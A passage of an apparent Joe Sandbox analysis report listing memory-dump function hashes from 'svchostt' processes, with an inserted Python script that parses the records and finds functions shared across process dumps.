                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d12a258403f44381a4b98f24096c314a0aaff66fd60ced7ddf7a50bd803fcad0
                                                                            • Instruction ID: ebd4973c6da3ab60e343d37cb188860ca008031cdb4e246720909c79b74f8db1
                                                                            • Opcode Fuzzy Hash: d12a258403f44381a4b98f24096c314a0aaff66fd60ced7ddf7a50bd803fcad0
                                                                            • Instruction Fuzzy Hash: BF31F121B1C9090FE798EF6C9469678B2C2EFD8305F0546BEA01EC32E7DD24AC028341
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                                                            • Instruction ID: 418a9ea806e1ccd207bb67409d9f687dd55e107c71b91ac69553623695c52f89
                                                                            • Opcode Fuzzy Hash: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                                                            • Instruction Fuzzy Hash: 87218415F1490A4BFB84BBBC546E7BC72D2EFD8715F504276E41DC32DADD28A8418392
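The record above (Opcode ID 25e7aa87…) carries the same Opcode ID, Instruction ID and fuzzy hashes as the record listed earlier from the process-17 dump (Source File 00000011.00000002.2587822188…), so the same function sits in the RWX, non-PE region at 0x7FFD9B7D0000 in both svchostt processes. That kind of cross-snapshot match is what an analyst wants surfaced automatically rather than spotted by eye. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses these "Memory Dump Source" records, decodes the process index, run and base address from the .sdmp file name (a layout inferred from this page, where the snapshot name hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd repeats the same three values; the remaining dotted fields are not interpreted because the page does not define them), cross-checks each record's snapshot name against its source file, and reports Opcode IDs that appear in dumps of more than one process. SAMPLE is a constructed excerpt of three records copied from this page.

```python
"""Parse Joe Sandbox 'Memory Dump Source' records and correlate them across dumps.

Added example, not part of the Joe Sandbox report or its tooling. SAMPLE is a
constructed excerpt of three records copied from the report; the .sdmp name layout
(process index, run, dump id, base address) is inferred from the page itself.
"""
import re
from collections import defaultdict

SAMPLE = """\
Memory Dump Source
• Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
• Instruction ID: 418a9ea806e1ccd207bb67409d9f687dd55e107c71b91ac69553623695c52f89
• Opcode Fuzzy Hash: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
• Instruction Fuzzy Hash: 87218415F1490A4BFB84BBBC546E7BC72D2EFD8715F504276E41DC32DADD28A8418392
Memory Dump Source
• Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
Similarity
• API ID:
• String ID: ;O_$<O_^
• API String ID: 0-3431308889
• Opcode ID: dfbfe2b9ea25a28e4dc3654a2b4222ee09f61aae90937a66752d2584ffea2117
• Instruction ID: 77398470a9d721d2532b4ddd592ec787a8ff45e2718839290279166b3783893b
• Opcode Fuzzy Hash: dfbfe2b9ea25a28e4dc3654a2b4222ee09f61aae90937a66752d2584ffea2117
• Instruction Fuzzy Hash: A341F776B096494BD304FBA8A0B9DEA7B62FFC4314F5145FAD018CB3DBCD2868468B44
Memory Dump Source
• Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
• Instruction ID: 418a9ea806e1ccd207bb67409d9f687dd55e107c71b91ac69553623695c52f89
• Opcode Fuzzy Hash: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
• Instruction Fuzzy Hash: 87218415F1490A4BFB84BBBC546E7BC72D2EFD8715F504276E41DC32DADD28A8418392
"""

RECORD_SEP = "Memory Dump Source"
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
# First four dotted fields of the .sdmp name: process index, run, dump id, base.
# Later fields are left undecoded; the report does not say what they mean.
SDMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\.")
# Snapshot name as seen on the page: hcaresult_<proc>_<run>_<base>_<process name>.jbxd
SNAP_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-fA-F]+)_(.+)\.jbxd$")


def parse_records(text):
    """Split report text into one dict per 'Memory Dump Source' record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == RECORD_SEP:
            current = {}
            records.append(current)
        elif current is not None and (m := FIELD_RE.match(line)):
            current[m.group(1).strip()] = m.group(2).strip()
    return records


def decode_source(record):
    """Process index, run, dump id and base address from the Source File name."""
    value = record["Source File"]
    m = SDMP_RE.match(value.split(",")[0])
    if not m:
        raise ValueError(f"unrecognised sdmp name: {value}")
    return {"process_index": int(m.group(1), 16), "run": int(m.group(2), 16),
            "dump_id": int(m.group(3)), "base": int(m.group(4), 16),
            "based_on_pe": value.endswith("based on PE: true")}


def snapshot_consistent(record):
    """Check the snapshot file name agrees with the decoded Source File fields."""
    src = decode_source(record)
    m = SNAP_RE.match(record["Snapshot File"])
    return bool(m) and (int(m.group(1)), int(m.group(2)), int(m.group(3), 16)) == (
        src["process_index"], src["run"], src["base"])


def shared_functions(records):
    """Opcode IDs that occur in dumps of more than one process index."""
    seen = defaultdict(set)
    for r in records:
        seen[r["Opcode ID"]].add(decode_source(r)["process_index"])
    return {oid: sorted(p) for oid, p in seen.items() if len(p) > 1}


def functions_with_strings(records):
    """Opcode IDs of records whose disassembly referenced a string."""
    return [r["Opcode ID"] for r in records if r.get("String ID")]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(f"{len(recs)} records; snapshot names consistent: "
          f"{all(snapshot_consistent(r) for r in recs)}")
    for oid, procs in shared_functions(recs).items():
        print(f"{oid[:16]}... present in process dumps {procs}")
    print("records with strings:", functions_with_strings(recs))
```

Run against the full report text instead of SAMPLE to get the complete list of functions common to the two svchostt dumps; a function whose Instruction Fuzzy Hash differs slightly between processes (as several pairs on this page do) will not be grouped by Opcode ID, so compare those hashes separately if near-matches matter.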
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7ae1968d22df19de1db795b807e1db4425e4f4f590fccbcb1c17cd03ea99a293
                                                                            • Instruction ID: c297a9a869891b4f28ad7c15efd618c390dcdcc8a60ba34126ffae6ed00e979a
                                                                            • Opcode Fuzzy Hash: 7ae1968d22df19de1db795b807e1db4425e4f4f590fccbcb1c17cd03ea99a293
                                                                            • Instruction Fuzzy Hash: 592160747549494FD744EBA8A0A9DEEBF63FFC8300F8149A8E4188339ECE3869018B55
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 414bbef510fb39c9ab19b3c6e8a8c6b339db144c806898e772d89360e2a9a653
                                                                            • Instruction ID: 72967970b8f3d2bc857aeeafeb4a7f64a481ad3dbb1d7eb1cddef22daf8823cb
                                                                            • Opcode Fuzzy Hash: 414bbef510fb39c9ab19b3c6e8a8c6b339db144c806898e772d89360e2a9a653
                                                                            • Instruction Fuzzy Hash: 4F012854A0D7850FE75166785C65431BFE0DBD1251B0A06ABE888C60B7D8086B858392
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.2704125300.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 932f3f08b60fac776e5f2a3145aeabbef23357ed64b42cff0f7b18ff75a20a70
                                                                            • Instruction ID: 40eec39672ff028d68af71ec9d2aca8f5746332d55468c1ae77968860424d9ca
                                                                            • Opcode Fuzzy Hash: 932f3f08b60fac776e5f2a3145aeabbef23357ed64b42cff0f7b18ff75a20a70
                                                                            • Instruction Fuzzy Hash: 5D32D960B19A4D4FE758EB688479BBDB7D2FFD8340F4506B9E04DC32E6DE28A9018741
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.2704125300.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e0ebcf37f1c52a4f0932d02531b978bb49c540331dc55ce2ef60a30a4d4baeba
                                                                            • Instruction ID: 25fd34b3704a5cfed48d3a3438615c32a6b23f6a9315b1537ef32f1435dcf4a8
                                                                            • Opcode Fuzzy Hash: e0ebcf37f1c52a4f0932d02531b978bb49c540331dc55ce2ef60a30a4d4baeba
                                                                            • Instruction Fuzzy Hash: 4E711616F0D6DA0EE356B67C64695F93BA1DFC622971981FBD0CDCA0E7CC0828878352
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.2704125300.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5b2e0e6fe83967d6e97197bec8dff5fe9b357737b3a9872c347747abe521eb44
                                                                            • Instruction ID: 0f3d40cc6ae911f0e6c5fa905b89502a690f562f8a027262ecde843306a7fb87
                                                                            • Opcode Fuzzy Hash: 5b2e0e6fe83967d6e97197bec8dff5fe9b357737b3a9872c347747abe521eb44
                                                                            • Instruction Fuzzy Hash: FA510010B1E6C94FD796ABB848746757FE4DF87219B0906FBE09DC61E7DD18180AC342
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.2704125300.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;O_$<O_^
                                                                            • API String ID: 0-3431308889
                                                                            • Opcode ID: f039f60a571a848c933c9dfc0cc83acd3e5b1757d5e394bac314b62c39363f78
                                                                            • Instruction ID: c94338c12d0db45a6469ed62a4b6bd307beedb7fd8cfeec055260bce79c9a44a
                                                                            • Opcode Fuzzy Hash: f039f60a571a848c933c9dfc0cc83acd3e5b1757d5e394bac314b62c39363f78
                                                                            • Instruction Fuzzy Hash: 2A41267AF096498BD705EB68A0A99F97B60EFC0314F4244FAD0198B3DBDD2868468B40
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.2704125300.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3c8b2e4bd4c6f73bf9b054ce7fe77d59ee15e743dae7cf2291269941cee790cf
                                                                            • Instruction ID: 52893e61bdc6d39a21065d90ea65f1dc598e4c13032c2aec830c43930960f58e
                                                                            • Opcode Fuzzy Hash: 3c8b2e4bd4c6f73bf9b054ce7fe77d59ee15e743dae7cf2291269941cee790cf
                                                                            • Instruction Fuzzy Hash: EB31FF72F09A4E4ED751AB6898795ED7BB1EFC4250F4602BAC14EE61B2DD24284A8350
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.2704125300.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d5fd5f08ec28eef454a7714d6a40f7d486ef5e919f45392a2434c19e200f5ca5
                                                                            • Instruction ID: 059fba483768eafd228b4fa4a5ff661b3ae3320fec7d8fa33654bd1838c63181
                                                                            • Opcode Fuzzy Hash: d5fd5f08ec28eef454a7714d6a40f7d486ef5e919f45392a2434c19e200f5ca5
                                                                            • Instruction Fuzzy Hash: 68310072F09A4E4ED751AB68D8795ED7BB1FFC4250F4602BAC14EE61B2DD242909C350
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.2704125300.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a73a91ccf67ac66583e09dcbfee5a2ef68709122f57304a893f683b49809af28
                                                                            • Instruction ID: 9b74e0eb2557e0be3b2f6c69f9846df09a222c651e197d976c50d9d7e6b64535
                                                                            • Opcode Fuzzy Hash: a73a91ccf67ac66583e09dcbfee5a2ef68709122f57304a893f683b49809af28
                                                                            • Instruction Fuzzy Hash: 8F31D072E09A4E4FD751AB68D8795EDBBB1EFC5240F4602BAC04EE71F6DD2429098350
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.2704125300.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 01dddcb81c6f1605496dd74d6e2725b07d5b46c92c6b5d0c9904912a5affcfa2
                                                                            • Instruction ID: b5610dd915eab1a787d4c5fb92d2765dab1809ca5ed47c51a228bb391023b439
                                                                            • Opcode Fuzzy Hash: 01dddcb81c6f1605496dd74d6e2725b07d5b46c92c6b5d0c9904912a5affcfa2
                                                                            • Instruction Fuzzy Hash: DB51C436F0961A8BDB04FBACA465AFC73B1EFC432AF51467AD109C72D6CE246446C790
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.2704125300.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c10afedb02aa4bf0362cd1952bfae4f8115301ea394cbbbf7ba1c8c92c2ea3c5
                                                                            • Instruction ID: 6d60e8e210dc78327fb39e090d298fe9d1e0e769892ff74d6525f9be70273bfd
                                                                            • Opcode Fuzzy Hash: c10afedb02aa4bf0362cd1952bfae4f8115301ea394cbbbf7ba1c8c92c2ea3c5
                                                                            • Instruction Fuzzy Hash: 8E41DF36B04A1E9FDB44FB68D865AED73A1FFC4315F41467AD009C7296CE34A846CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.2704125300.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d871dbacc6d4f671b74aa41eb69f1ce829861572a1484f63e5da494978afdfd8
                                                                            • Instruction ID: 3b393743250d56c190e494d13e2a349c7d987d3949e17915f3159cebbbcd345e
                                                                            • Opcode Fuzzy Hash: d871dbacc6d4f671b74aa41eb69f1ce829861572a1484f63e5da494978afdfd8
                                                                            • Instruction Fuzzy Hash: 7331D121B1C9490FE798EF6C9469679B2C2EFD8355F0546BEA05EC32E7DD24AC428341
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.2704125300.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                                                            • Instruction ID: 418a9ea806e1ccd207bb67409d9f687dd55e107c71b91ac69553623695c52f89
                                                                            • Opcode Fuzzy Hash: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                                                            • Instruction Fuzzy Hash: 87218415F1490A4BFB84BBBC546E7BC72D2EFD8715F504276E41DC32DADD28A8418392
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.2704125300.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b8e4e022233ec75dbaf867c5db0ea6a85a0c2b8f79e75d3b2be7073a9ae7d11a
                                                                            • Instruction ID: d472967fc6bb3cf8a2841a547f78fb0d94d7ef47263a82e0d0defa9361150fe5
                                                                            • Opcode Fuzzy Hash: b8e4e022233ec75dbaf867c5db0ea6a85a0c2b8f79e75d3b2be7073a9ae7d11a
                                                                            • Instruction Fuzzy Hash: FB216275B545498FD746EB68A0A9DFDBF61EFC8300F8348E8E4198339ADD3859018B51
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.2704125300.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2e3897ad3f4aee262678d679392d6ef33436c9ac19acfd59982b8e324892746d
                                                                            • Instruction ID: ef1ed5f2e578c01c83760315ae09fd1b7605f280c32bc13ab385d170202fb328
                                                                            • Opcode Fuzzy Hash: 2e3897ad3f4aee262678d679392d6ef33436c9ac19acfd59982b8e324892746d
                                                                            • Instruction Fuzzy Hash: EA014C14E0D7850FE75266785C75431BFE0CFD1251B0A07BBF888C60F7D8086B458392